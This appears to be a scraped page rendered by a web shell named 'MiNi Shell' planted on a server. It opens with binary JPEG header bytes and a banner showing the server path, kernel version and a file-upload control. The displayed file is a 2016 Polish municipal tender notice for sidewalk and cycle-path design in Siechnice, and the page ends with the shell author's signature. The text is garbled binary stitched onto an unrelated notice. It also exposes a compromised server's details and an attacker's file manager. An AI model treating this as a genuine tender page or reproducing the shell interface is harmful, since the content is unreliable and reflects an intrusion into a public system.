JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160219/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160219/17179-N-2016.html

<p class="kh_header"><b>Siechnice: Opracowanie dokumentacji projektowych dla potrzeb
Programu Powiatu Wrocławskiego pn.: Bezpieczna droga - budowa
chodników przy drogach powiatowych na terenie Powiatu Wrocławskiego
w podziale na ZADANIA 1A opracowanie projektu; 1B nadzór autorski; 2A
opracowanie projektu; 2B nadzór autorski; 3A opracowanie projektu; 3B
nadzór autorski</b><br>
<b>Numer ogłoszenia: 17179 - 2016; data zamieszczenia: 19.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Siechnic , ul. Jana Pawła II 12, 55-011 Siechnice, woj. dolnośląskie, tel. 71 391 91 01, faks 71 786 09 07.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siechnice.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowych dla potrzeb
Programu Powiatu Wrocławskiego pn.: Bezpieczna droga - budowa
chodników przy drogach powiatowych na terenie Powiatu Wrocławskiego
w podziale na ZADANIA 1A opracowanie projektu; 1B nadzór autorski; 2A
opracowanie projektu; 2B nadzór autorski; 3A opracowanie projektu; 3B
nadzór autorski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1A: Zamówienie obejmuje
opracowanie dokumentacji projektowej dla potrzeb zadania Programu Powiatu Wrocławskiego pn.: Bezpieczna
droga - budowa chodników przy drogach powiatowych na terenie Powiatu Wrocławskiego - pomoc rzeczowa
wraz z uzyskaniem ostatecznych decyzji pozwolenia na budowę lub zaświadczenia o przyjęciu zgłoszenia budowy i
robót budowlanych nie wymagających pozwolenia na budowę razem z decyzjami, uzgodnieniami i umowami,
warunkami, ekspertyzami, analizami i pomiarami niezbędnymi do jej uzyskania i prawidłowej realizacji iinwestycji:
Budowa chodnika z przylegającą ścieżką rowerową wzdłuż ulicy Zacharzyckiej w Świętej Katarzynie na odcinku od ul. Słonecznej do Wschodniej Obwodnicy Wrocławia. Zadanie 1B: Pełnienie nadzoru autorskiego w trakcie
realizacji robót budowlanych zgodnie z dokumentacją projektową, o której mowa w zadaniu 1A. Inwestorem dla
przedmiotowej inwestycji jest Powiat Wrocławski ul. Kościuszki 131, 50-440 Wrocław. Zadanie 2A: Zamówienie
obejmuje opracowanie dokumentacji projektowej dla potrzeb zadania Programu Powiatu Wrocławskiego pn.:
Bezpieczna droga - budowa chodników przy drogach powiatowych na terenie Powiatu Wrocławskiego - pomoc
rzeczowa wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę lub zaświadczenia o przyjęciu zgłoszenia
budowy i robót budowlanych nie wymagających pozwolenia na budowę razem z decyzjami, uzgodnieniami i
umowami, warunkami, ekspertyzami, analizami i pomiarami niezbędnymi do jej uzyskania i prawidłowej realizacji
inwestycji: Budowa chodnika wzdłuż ulicy Zacharzyckiej od Wschodniej Obwodnicy Wrocławia do Zacharzyc.
Zadanie 2B: Pełnienie nadzoru autorskiego w trakcie realizacji robót budowlanych zgodnie z dokumentacją
projektową, o której mowa w zadaniu 2A. Inwestorem dla przedmiotowej inwestycji jest Powiat Wrocławski ul.
Kościuszki 131, 50-440 Wrocław.Zadanie 3A: Zamówienie obejmuje opracowanie dokumentacji projektowej dla
potrzeb zadania Programu Powiatu Wrocławskiego pn.: Bezpieczna droga - budowa chodników przy drogach
powiatowych na terenie Powiatu Wrocławskiego - pomoc rzeczowa wraz z uzyskaniem ostatecznej decyzji
pozwolenia na budowę lub zaświadczenia o przyjęciu zgłoszenia budowy i robót budowlanych nie wymagających
pozwolenia na budowę razem z decyzjami, uzgodnieniami i umowami, warunkami, ekspertyzami, analizami i
pomiarami niezbędnymi do jej uzyskania i prawidłowej realizacji inwestycji: Budowa chodnika z przylegającą
ścieżką rowerową wzdłuż ulicy Gen. H. Dąbrowskiego na odcinku od posesji nr 5 do Klasztoru w Świętej
Katarzynie. Zadanie 3B: Pełnienie nadzoru autorskiego w trakcie realizacji robót budowlanych zgodnie z
dokumentacją projektową, o której mowa w zadaniu 3A. Inwestorem dla przedmiotowej inwestycji jest Powiat
Wrocławski ul. Kościuszki 131, 50-440 Wrocław.Pełnienie nadzoru autorskiego w trakcie realizacji robót
budowlanych, zgodnie z dokumentacją projektową. W kosztach nadzoru autorskiego należy uwzględnić koszty
dojazdu, delegacji, itp. Projektant zobowiązuje się do sprawowania nadzoru autorskiego w ramach wynagrodzenia
umownego w okresie 3 lat od daty pozytywnego odbioru dokumentacji.Podana przez Zamawiającego ilość wizyt,
służąca do porównania ofert w celu ich oceny, może ulec zmianie w trakcie realizacji zadania.Szczegółowy zakres
przedmiotu zamówienia i sposób jego realizacji określa Załącznik nr 1A stanowiący integralną część
SIWZ. Zamawiający zastrzega sobie w trakcie obowiązywania umowy prawo wskazania innego podmiotu, który
będzie wykonywał obowiązki Zamawiającego, zmiana ta nie wymaga formy aneksu do umowy, lecz jedynie
pisemnego powiadomienia. CPV: 71320000-7 usługi inżynieryjne w zakresie projektowania; 71248000-8 nadzór
nad projektem i dokumentacją.Wykonawca może złożyć tylko jedna ofertę. Zamawiający nie dopuszcza składania
ofert częściowych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielanie zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt. 6 ustawy Prawo
zamówień publicznych</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2019.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium w wysokości 1000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca posiada uprawnienia do wykonywania określonej
działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem
terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował
zamówienia o charakterze i złożoności porównywalnej z przedmiotem zamówienia tj.: minimum 2
zamówieniami o charakterze i złożoności porównywalnej z przedmiotem zamówienia tj. opracowaniem
dokumentacji projektowej budowy, przebudowy lub rozbudowy ulic, chodników, ścieżek rowerowych o
nawierzchni z kostki brukowej betonowej o długości co najmniej po 300 m każde zadanie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że dysponuje personelem posiadającym
doświadczenie i uprawnienia w specjalności:a)inżynieryjnej drogowej lub odpowiadające im uprawnienia
w specjalności konstrukcyjno-budowlanej wydane przed 11.07.2003r., oraz doświadczenie w wykonaniu
co najmniej 1 dokumentacji projektowej dot. modernizacji, przebudowy lub budowy drogi na stanowisku
projektanta w branży inżynieryjnej drogowej bez ograniczeń lub konstrukcyjno-budowlanej bez
ograniczeń wydane przed 11.07.2003r.,b) instalacyjnej w zakresie sieci</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca jest ubezpieczony od odpowiedzialności cywilnej w
zakresie prowadzonej działalności na kwotę co najmniej 50 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>minimum 2 zamówienia o charakterze i złożoności porównywalnej z przedmiotem zamówienia tj. opracowanie dokumentacji projektowej budowy, przebudowy lub rozbudowy ulic, chodników, ścieżek rowerowych o nawierzchni z kostki brukowej betonowej o długości co najmniej po 300 m każde zadanie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie, że przy opracowaniu projektu zostaną wskazane materiały które będą posiadały
właściwości użytkowe wymagane przy realizacji takich obiektów, a także będą posiadały ważne atesty,
certyfikaty i deklaracje zgodności dopuszczające do stosowania na terenie Polski</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o zalecanym zapoznaniu się z terenem i zaakceptowaniu warunków przetargu. W przypadku
składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie
musi być złożone przez każdego wykonawcę w zakresie w jakim jego dotyczy. Pełnomocnictwo dla podmiotów
występujących wspólnie, jeżeli zaistnieje taka sytuacja, zgodnie z art. 23 ustawy Prawo zamówień publicznych. W
razie wyboru oferty podmiotów występujących wspólnie, Zamawiający zażąda przed zawarciem umowy -
stosownie do art. 23 ust. 4 - umowy regulującej współpracę tych podmiotów.Oferta konsorcjum musi spełniać
następujące wymagania - zawierać odrębne i niezależne dla każdego uczestnika konsorcjum wszystkie dokumenty
i oświadczenia wymienione powyżej, podpisana w taki sposób, by zobowiązywała prawnie wszystkie strony - to
znaczy podpisana przez przedstawiciela konsorcjum, którego upoważnienie do złożenia oferty wynika z
dołączonego pełnomocnictwa, udzielonego przez upoważnionych przedstawicieli członków konsorcjum.
Pełnomocnictwo dla osoby podpisującej ofertę i inne dokumenty w imieniu wykonawcy, jeżeli jest to osoba nie
wykazana w rejestrze. Zaakceptowane istotne postanowienia umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - skrócenie terminu wykonania - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość przerwania świadczenia prac nie z winy Wykonawcy, których nie można było
przewidzieć lub którym skutkom nie można było zapobiec, pomimo dołożenia przez Wykonawcę najwyższej
staranności (np.: klęska żywiołowa i inne). Zamawiający dopuszcza zmianę terminu realizacji umowy w przypadku
wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu
określonego w Umowie, termin ten może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych okoliczności.
Zamawiający dopuszcza możliwość zmiany sposobu rozliczania umowy lub dokonywania płatności. Zamawiający
dopuszcza możliwość zmiany stawki podatku VAT w przypadku zmiany przepisów dotyczących podatku VAT.
Zamawiający dopuszcza zmianę przedstawicieli stron umowy. Zamawiający dopuszcza zmianę osób
odpowiedzialnych bezpośrednio za realizację zamówienia, przedstawionych w ofercie, jedynie za uprzednią
pisemną zgodą Zamawiającego, akceptując nowe osoby, w przypadku, gdy:1)Wykonawca z własnej inicjatywy
proponuje zmianę w następujących przypadkach:a)śmierci, choroby lub innych zdarzeń losowych dotyczących tych
osób,b)nie wywiązywania się tych osób z obowiązków wynikających z umowy,2)jeżeli zmiana tych osób stanie się
konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy (np. rezygnacji),3)jeżeli zmiana tych osób stała
się konieczna z jakichkolwiek przyczyn niezależnych.Zamawiający może zażądać od wykonawcy zmiany osób
odpowiedzialnych bezpośrednio za realizację zamówienia, jeżeli uzna, że nie wykonują one swoich obowiązków
wynikających z umowy. Wykonawca zobowiązany jest zmienić te osoby zgodnie z żądaniem Zamawiającego we
wskazanym przez Zamawiającego terminie.W przypadku zmiany którejkolwiek osoby odpowiedzialnej
bezpośrednio za realizację zamówienia nowa osoba musi spełniać wymagania określone w SIWZ dla danego
specjalisty. Po otrzymaniu pisemnej prośby dot. zmiany którejkolwiek osoby odpowiedzialnej bezpośrednio za
realizację zamówienia określonej w umowie, w terminie 14 dni od przekazania, Zamawiający może wyrazić zgodę
na powyższe. Dopuszcza się zmiany na skutek wydanych decyzji, uzgodnień, faktycznych uwarunkowań
terenowych i gruntowych, powodujących konieczność modyfikacji rozwiązań.Innych sytuacji, których nie można
było przewidzieć w chwili zawarcia umowy i mających charakter zmian nieistotnych tj. nie odnoszących się do
kwestii, które podlegały ocenie podczas wyboru Wykonawcy i takich, które gdyby były znane w momencie
wszczęcia procedury mającej na celu wybór Wykonawcy, nie miałyby wpływu na udział większej ilości podmiotów
zainteresowanych tą procedurą. 16.11. Zamawiający dopuszcza zmianę terminu realizacji umowy lub
poszczególnych jej części o czas trwania poniższych okoliczności, w przypadku: 1)wystąpienia okoliczności
niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu określonego w Umowie, termin ten
może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych okoliczności,2)konieczności wprowadzenia zmian
w dokumentacji projektowej, a wynikających z konieczności dostosowania zakresu zadania do wytycznych programowych lub powszechnie obowiązujących przepisów prawa lub3)opóźnień Zamawiającego w przekazaniu
Wykonawcy dokumentów, do których przekazania Zamawiający był zobowiązany,4)działania siły wyższej w
rozumieniu przepisów Kodeksu cywilnego lub5)niezawinionym przez Wykonawcę opóźnieniem związanym z
uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów lub6)koniecznością
wykonania zamówień dodatkowych lub7)innymi okolicznościami nie powstałymi z winy Wykonawcy. Uwaga:
Zamawiający dopuszcza zmianę terminu umowy w sytuacjach wyjątkowych, które muszą być udokumentowane
przez Wykonawcę w sposób jednoznaczny i nie budzący wątpliwości.Zamawiający dopuszcza zmianę
podwykonawców realizujących poszczególne części zamówienia w przypadku wprowadzenia podwykonawcy,
wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu robót
wykonywanych przez podwykonawcę. Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy
Wykonawcy z podwykonawcą wraz z częścią dokumentacji dot. wykonania robót określonych w umowie, w
terminie szczegółowo opisanym w istotnych warunkach umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.siechnice.gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Siechnice, ul. Jana Pawła II 12, 55-011 Siechnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2016 godzina 11:30, miejsce: Gmina Siechnice, ul. Jana Pawła II 12, 55-011 Siechnice, kancelaria - parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com